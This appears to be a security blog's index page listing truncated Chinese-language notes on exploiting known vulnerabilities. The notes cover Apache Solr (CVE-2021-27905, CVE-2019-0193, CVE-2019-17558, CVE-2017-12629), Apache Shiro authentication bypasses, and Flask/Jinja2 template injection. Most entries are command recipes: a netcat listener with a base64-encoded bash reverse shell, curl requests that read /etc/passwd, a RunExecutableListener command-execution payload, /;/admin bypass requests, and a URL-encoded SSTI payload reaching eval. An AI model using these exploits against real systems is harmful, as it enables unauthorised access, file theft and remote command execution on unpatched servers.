【笔记】SwaggerHack学习笔记
前言批量测试Swagger中出现的API接口
下载项目12git clone https://github.com/jayus0821/swagger-hack.gitcd swagger-hack
源代码swagger-hack.py1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621 ...
【笔记】CVE-2021-27905漏洞利用
前言Java的Solr框架利用SSRF实现任意文件读取漏洞利用
获取数据库名1curl http://<ip>:8983/solr/admin/cores?indexInfo=false&wt=json
触发
<database>:上一步获取的数据库名
1curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' $'http://<ip>:8983/solr/<database>/config'
读取文件
/etc/passwd:读取文件
1curl -i -s -k 'http://& ...
【笔记】CVE-2019-0193漏洞利用
前言Java的Solr框架远程命令执行漏洞利用
漏洞利用前提
Apache Solr < 8.2.0
能进入Solr管理页面
攻击者监听反弹Shell1nc -lvp <port>
将反弹Shell的命令进行Base64编码1echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64
受害者反弹Shell
访问http://localhost:8983/solr进入Solr管理页面
选择一个核心->DataImport->勾选Debug->展开Configuration->选择Debug-Mode->修改xml配置->Execute with this Configuration
<base64>:上一步Base64编码后的反弹Shell命令
1234567<dataConfig> <dataSource type="URLDataSource&qu ...
【笔记】CVE-2019-17558漏洞利用
前言通过jas502n/solr_rce实现Java的Solr框架远程命令执行漏洞利用Solr默认端口号为8983
漏洞利用前提
Apache Solr >= 5.0.0 <= 8.3.1
下载项目12git clone https://github.com/jas502n/solr_rce.gitcd solr_rce
漏洞利用
<ip>:受害者IP地址<shell>:远程执行的Shell命令
1python2 solr_rce.py http://<ip>:8983 <shell>
完成
【笔记】CVE-2017-12629漏洞利用
前言Java的Solr框架远程命令执行漏洞利用Solr默认端口号为8983
漏洞利用前提
Apache Solr < 7.1.0
exprequest1234POST http://example.com/solr/admin/configContent-Type: application/json{"add-listener":{"event":"postCommit","name":"x","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","<shell>"]}
触发request1234POST http://example.com/solr/admi ...
【笔记】CVE-2020-1957漏洞利用
前言Java的Shiro框架未授权访问漏洞利用
漏洞利用前提
Apache Shiro < 1.5.3
poc
如果能正常访问/login,则可以通过/;/login测试是否依然可以显示
如果可以正常显示,说明存在漏洞;如果显示报错页面,说明不存在漏洞
request1GET http://example.com/;/login
漏洞利用
通过/;/admin绕过Shiro直接进入管理员页面
request1GET http://example.com/;/admin
完成
【笔记】CVE-2020-11989漏洞检测
前言Java的Shiro框架漏洞检测
漏洞利用前提
Apache Shiro < 1.7.1
pocrequest1GET http://example.com/admin/%20
如果可以绕过Shiro直接进入管理员页面,说明存在漏洞
完成
【笔记】编译pentestkit浏览器插件
前言The Penetration Testing Kit (PTK) browser extension is your all-in-one solution for streamlining your daily tasks in the realm of application security. Whether you’re a penetration tester, a member of a Red Team, or an application security practitioner, this extension is designed to enhance your efficiency and provide valuable insights.(Github)
下载项目12git clone https://github.com/DenisPodgurskii/pentestkit.gitcd pentestkit
下载依赖1npm install
手动下载部分已缺失的依赖12wget https://cdn.jsdelivr.net/npm/wap ...
【笔记】判断是否使用了Shiro
前言判断是否使用了Shiro
正文
判断响应头中是否写入Cookie值remberMe=deleteMe
request1Set-Cookie: rememberMe=deleteMe
完成
【笔记】Flask的ssti漏洞利用
前言Python的Flask框架的ssti漏洞利用
漏洞利用前提
代码中使用了Jinja2模板引擎,且模版中的变量来自于请求参数
exp
<shell>:URL编码后的远程执行的Shell命令
request1GET http://example.com/?id=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20% ...